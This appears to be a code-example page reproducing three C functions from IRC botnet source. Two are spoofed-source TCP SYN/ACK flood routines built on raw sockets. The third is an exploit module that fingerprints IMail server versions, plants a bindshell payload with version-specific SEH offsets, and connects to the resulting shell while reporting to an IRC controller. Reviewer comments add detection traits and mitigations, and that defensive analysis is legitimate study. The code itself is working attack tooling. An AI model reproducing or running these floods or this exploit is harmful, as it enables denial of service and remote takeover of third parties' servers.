예제 #1
/*
 * SendDDOS - flood routine from a bot: for `len` seconds it sends bare TCP
 * segments (IP header + TCP header, no payload) to TargetIP:TargetPort over a
 * raw socket, with a forged source address that advances by one per packet.
 *
 * Parameters:
 *   TargetIP    destination address, copied unchanged into the sockaddr and the IP header
 *   SpoofingIP  first forged source address; passed through fhtonl() and incremented per packet
 *   Type        "ddos.syn", "ddos.ack" or "ddos.random"; selects the TCP flags
 *   TargetPort  destination TCP port
 *   len         run time in seconds (multiplied by the performance-counter frequency)
 *
 * Returns the sum of the fsendto() return values on normal completion, and
 * 0 (FALSE) on any set-up or send failure.
 *
 * The f-prefixed calls (fWSAStartup, fsendto, ...) are defined elsewhere;
 * presumably pointers to the Winsock APIs resolved at run time, in which case
 * they would not appear in the import table -- confirm.
 *
 * Traffic traits visible in this code that a detection rule can key on:
 * constant IP ident, TTL 128, TCP window 16384, header-only segments without
 * TCP options, source ports in 1000..2000, and consecutive source addresses.
 * Network-side mitigations for this class of traffic are SYN cookies on the
 * listener and source-address validation (ingress/egress filtering) upstream.
 */
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{ 
	WSADATA WSAData; 
	SOCKET sock; 
	SOCKADDR_IN addr_in; 
	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 
 
	LARGE_INTEGER freq, halt_time, cur;
	char szSendBuf[60]={0},buf[64]; 
	int rect;

	if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) 
		return FALSE; 
 
	// Raw IP socket: the caller supplies the whole packet, IP header included.
	// NOTE(review): raw sockets need administrator rights on Windows, and client
	// releases since XP SP2 restrict TCP sends over raw sockets -- confirm which
	// hosts this path can actually run on.
	if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
		fWSACleanup();
		return FALSE;
	}

	// IP_HDRINCL: the IP header written below is used as-is, which is what
	// makes the forged source address possible.
	BOOL flag=TRUE;
	if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
		fclosesocket(sock);
		fWSACleanup();
		return FALSE; 
	}

	// Only these three fields of addr_in are set; the structure is not zeroed first.
	addr_in.sin_family=AF_INET;
	addr_in.sin_port=fhtons((unsigned short)TargetPort);
	addr_in.sin_addr.s_addr=TargetIP;

	// Fixed IP header fields, identical in every packet of the run.
	ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));	// version 4, header length in 32-bit words
	ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));	// headers only, no payload
	ipHeader.ident=1;	// constant identification value
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_TCP;
	ipHeader.checksum=0;
	ipHeader.destIP=TargetIP;

	tcpHeader.dport=fhtons((unsigned short)TargetPort);
	// sport and seq set here are overwritten at the top of every loop iteration.
	tcpHeader.sport=fhtons((unsigned short)rand()%1025);
	tcpHeader.seq=fhtonl(0x12345678);

	/* SYN flood mechanics: every SYN makes the target answer with a SYN-ACK and
	hold a half-open connection while it waits for the final ACK. Because the
	source address is forged, that ACK never arrives, so the queue of half-open
	connections fills and further SYNs are refused until the entries time out
	or the flood stops. SYN cookies keep the listener from holding state per
	half-open connection, and source-address validation at the network edge
	stops forged sources from leaving the originating network. */

	// Flag selection by command name. There is no final else: for any other
	// Type string, flags and ack_seq keep whatever the stack held.
	if (strcmp(Type,"ddos.syn") == 0) {
		tcpHeader.ack_seq=0;
		tcpHeader.flags=SYN;
	} else if (strcmp(Type,"ddos.ack") == 0) {
		tcpHeader.ack_seq=0;
		tcpHeader.flags=ACK;
	} else if (strcmp(Type,"ddos.random") == 0) {
		// Chosen once here, not per packet: the whole run uses one flag value.
		tcpHeader.ack_seq=rand()%3;
		if (rand()%2 == 0) 
			tcpHeader.flags=SYN;
		else 
			tcpHeader.flags=ACK;
	}
	
	tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 	// data offset = bare header, no TCP options
	tcpHeader.window=fhtons(16384); 
	tcpHeader.urg_ptr=0; 

	// Deadline = now + len seconds, in performance-counter ticks.
	long total = 0;
	QueryPerformanceFrequency(&freq);
	QueryPerformanceCounter(&cur);
	halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
 
	while(TRUE) {
		tcpHeader.checksum=0; 
		tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));	// source port in 1000..2000
		tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));	// cast keeps only the low 16 bits

		ipHeader.sourceIP=fhtonl(SpoofingIP++); 	// forged source, advances by one per packet

		// TCP checksum is computed over pseudo-header + TCP header, staged in szSendBuf.
		// checksum() is defined elsewhere; presumably the Internet checksum -- confirm.
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons(sizeof(tcpHeader));
		psdHeader.saddr=ipHeader.sourceIP; 
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
		
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
 
		// Rebuild the buffer as the real packet (IP header + TCP header), zero the
		// four bytes after it, and compute the value stored in the IP checksum field.
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
 
		// Copy the IP header again so the buffer carries the checksum just computed.
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
		if (rect==SOCKET_ERROR) {
			// The Winsock error code is written to the bot's own log via addlog()
			// (defined elsewhere); the "[DDoS]: Send error" text is a string artifact.
			sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
			addlog(buf);

			fclosesocket(sock);
			fWSACleanup();
			return 0;
		}
     
		total += rect;
		// Stop once the deadline computed before the loop has passed.
		QueryPerformanceCounter(&cur);
		if (cur.QuadPart >= halt_time.QuadPart)
			break;
	}

	fclosesocket(sock); 
	fWSACleanup(); 
 
	return (total);
}
예제 #2
파일: imail.cpp 프로젝트: hazcod/botnets
/*
 * iMail - exploit module of an IRC-controlled bot. It connects to
 * exinfo.ip:exinfo.port over TCP, reads the service banner, maps the
 * "IMail x.yy" version string to an index into pImailTargets, writes that
 * entry's 4-byte lOffset into the global szImailPacket, sends the packet and
 * then calls ConnectShell(exinfo, bindport).
 *
 * Parameters:
 *   target  first argument of every irc->privmsg() call; presumably the IRC
 *           channel or nick that receives status lines -- confirm
 *   conn    cast to IRC*; the controller connection used for reporting
 *   exinfo  fields read here: ip, port, silent, verbose, exploit
 *
 * Returns FALSE on every path visible in this block (see the note at the end).
 *
 * szImailPacket, bindshell, pImailTargets, bindport, scan_title, exploit[] and
 * ConnectShell are defined elsewhere in the project.
 *
 * What a defender can take from this block: the module depends on the
 * version string in the service banner, so it only proceeds against the
 * listed 7.04-8.15 builds; success is tested by connecting to a second port
 * on the victim (bindport), which inbound filtering of unexpected ports
 * interrupts; and the status strings sent over IRC ("Beginning attack on",
 * "Crafting Malicious Packet for", ...) are stable text artifacts in the
 * binary and in controller traffic.
 */
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
	IRC* irc=(IRC*)conn;
	char szBanner[512];//, szShellcode[512];
	int iRemoteTarget;
	int ibindsize=405;
	SOCKET sSocket;

// In each status line below only the privmsg() is guarded by the if;
// the Sleep(1500) that follows on the same line runs unconditionally,
// so every stage is followed by a 1.5 s pause.
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);

	SOCKADDR_IN sinSockAddrIn;
	memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));

	sinSockAddrIn.sin_family		= AF_INET;
	sinSockAddrIn.sin_addr.s_addr	= finet_addr(exinfo.ip);
	sinSockAddrIn.sin_port			= fhtons(exinfo.port);

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);

	if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);

	if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);

	// Banner grab: a single recv of up to 512 bytes of whatever the service
	// sends on connect.
	if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);

	// Version fingerprinting by substring match on the banner. Several
	// versions share an index; index 11 is never assigned; anything that
	// does not match yields -1.
	if (strstr(szBanner,"IMail 7.04"))
		iRemoteTarget = 0;
	else if (strstr(szBanner,"IMail 7.05"))
		iRemoteTarget = 1;
	else if (strstr(szBanner,"IMail 7.06"))
		iRemoteTarget = 2;
	else if (strstr(szBanner,"IMail 7.07"))
		iRemoteTarget = 2;
	else if (strstr(szBanner,"IMail 7.10"))
		iRemoteTarget = 3;
	else if (strstr(szBanner,"IMail 7.11"))
		iRemoteTarget = 4;
	else if (strstr(szBanner,"IMail 7.12"))
		iRemoteTarget = 5;
	else if (strstr(szBanner,"IMail 7.13"))
		iRemoteTarget = 6;
	else if (strstr(szBanner,"IMail 7.14"))
		iRemoteTarget = 6;
	else if (strstr(szBanner,"IMail 7.15"))
		iRemoteTarget = 6;
	else if (strstr(szBanner,"IMail 8.00"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.01"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.02"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.03"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.04"))
		iRemoteTarget = 8;
	else if (strstr(szBanner,"IMail 8.05"))
		iRemoteTarget = 9;
	else if (strstr(szBanner,"IMail 8.10"))
		iRemoteTarget = 10;
	else if (strstr(szBanner,"IMail 8.11"))
		iRemoteTarget = 12;
	else if (strstr(szBanner,"IMail 8.12"))
		iRemoteTarget = 13;
	else if (strstr(szBanner,"IMail 8.13"))
		iRemoteTarget = 14;
	else if (strstr(szBanner,"IMail 8.14"))
		iRemoteTarget = 14;
	else if (strstr(szBanner,"IMail 8.15"))
		iRemoteTarget = 15;
	else
		iRemoteTarget = -1;

// The raw banner received from the remote host is relayed to the controller here.
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);

	// The payload bytes are copied into the global packet before the
	// unsupported-version check below, so the global is modified either way.
	memcpy(szImailPacket + 12, bindshell, ibindsize -1);

	// Unrecognised banner: stop without sending anything further.
	if (iRemoteTarget == -1) return FALSE;
	// Per-version 4-byte value, written at one of two fixed positions in the
	// packet depending on iSEHAddress (0 or 1); any other value writes nothing.
	if (pImailTargets[iRemoteTarget].iSEHAddress == 0) 
		memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
	else 
		if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
			memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);

	// The whole global buffer is sent in one call; its size is fixed by its
	// declaration elsewhere.
	if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);

	fclosesocket(sSocket);

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
	
	// Success is judged by ConnectShell(exinfo, bindport) (defined elsewhere;
	// presumably it connects to bindport on the victim -- confirm). On
	// success the per-exploit counter is incremented and, unless silent, the
	// controller is told.
	if (ConnectShell(exinfo,bindport))
	{
		if (!exinfo.silent)
			irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		exploit[exinfo.exploit].stats++;
	} else
		if (!exinfo.silent && exinfo.verbose)
			irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		// Despite the indentation this return is not part of the else branch:
		// it runs on both paths, so the function reports FALSE even on success.
		return FALSE;
}
예제 #3
/*
 * SendSyn - SYN-only flood routine from a bot: for `len` seconds it sends
 * bare TCP SYN segments (IP header + TCP header, no payload) to
 * TargetIP:TargetPort over a raw socket, with a forged source address that
 * advances by one per packet.
 *
 * Parameters:
 *   TargetIP    destination address, copied unchanged into the sockaddr and the IP header
 *   SpoofingIP  first forged source address; passed through fhtonl() and incremented per packet
 *   TargetPort  destination TCP port
 *   len         run time in seconds (multiplied by the performance-counter frequency)
 *
 * Returns the sum of the fsendto() return values on normal completion, and
 * 0 (FALSE) on any set-up or send failure.
 *
 * The f-prefixed calls are defined elsewhere; presumably pointers to the
 * Winsock APIs resolved at run time -- confirm.
 *
 * Traffic traits visible in this code that a detection rule can key on:
 * constant IP ident, TTL 128, TCP window 16384, header-only SYN segments
 * without TCP options, source ports in 1000..2000, and consecutive source
 * addresses. SYN cookies on the listener and source-address validation
 * upstream are the usual mitigations for this class of traffic.
 */
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{ 
	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 
 
	LARGE_INTEGER freq, halt_time, cur;
	char szSendBuf[60]={0},buf[64]; 
	int rect;

	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
		return FALSE; 
 
	// Raw IP socket: the caller supplies the whole packet, IP header included.
	// NOTE(review): raw sockets need administrator rights on Windows, and client
	// releases since XP SP2 restrict TCP sends over raw sockets -- confirm which
	// hosts this path can actually run on.
	SOCKET sock; 
	if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
		fWSACleanup();
		return FALSE; 
	}

	// IP_HDRINCL: the IP header written below is used as-is, which is what
	// makes the forged source address possible.
	BOOL flag=TRUE;
	if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
		fclosesocket(sock);
		fWSACleanup();
		return FALSE; 
	}

	SOCKADDR_IN ssin; 
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family=AF_INET;
	ssin.sin_port=fhtons(TargetPort);
	ssin.sin_addr.s_addr=TargetIP;

	// Fixed IP header fields, identical in every packet of the run.
	ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));	// version 4, header length in 32-bit words
	ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));	// headers only, no payload
	ipHeader.ident=1;	// constant identification value
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_TCP;
	ipHeader.checksum=0;
	ipHeader.destIP=TargetIP;

	// Fixed TCP header fields; sport and seq are filled in per packet inside the loop.
	tcpHeader.dport=fhtons(TargetPort);
	tcpHeader.ack_seq=0;
	tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 	// data offset = bare header, no TCP options
	tcpHeader.flags=2; 	// 2 is the SYN bit of the TCP flags field
	tcpHeader.window=fhtons(16384); 
	tcpHeader.urg_ptr=0; 

	// Deadline = now + len seconds, in performance-counter ticks.
	long total = 0;
	QueryPerformanceFrequency(&freq);
	QueryPerformanceCounter(&cur);
	halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
 
	while (1) {
		tcpHeader.checksum=0; 
		tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));	// source port in 1000..2000
		tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));	// cast keeps only the low 16 bits

		ipHeader.sourceIP=fhtonl(SpoofingIP++); 	// forged source, advances by one per packet

		// TCP checksum is computed over pseudo-header + TCP header, staged in szSendBuf.
		// checksum() is defined elsewhere; presumably the Internet checksum -- confirm.
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons(sizeof(tcpHeader));
		psdHeader.saddr=ipHeader.sourceIP; 
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
		
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
 
		// Rebuild the buffer as the real packet (IP header + TCP header), zero the
		// four bytes after it, and compute the value stored in the IP checksum field.
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
 
		// Copy the IP header again so the buffer carries the checksum just computed.
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
		if (rect==SOCKET_ERROR) {
			// The Winsock error code is written to the bot's own log via addlog()
			// (defined elsewhere); the "[SYN]: Send error" text is a string artifact.
			sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
			addlog(buf);

			fclosesocket(sock);
			fWSACleanup();
			return 0;
		}
     
		total += rect;
		// Stop once the deadline computed before the loop has passed.
		QueryPerformanceCounter(&cur);
		if (cur.QuadPart >= halt_time.QuadPart)
			break;
	}

	fclosesocket(sock); 
	fWSACleanup(); 
 
	return (total);
}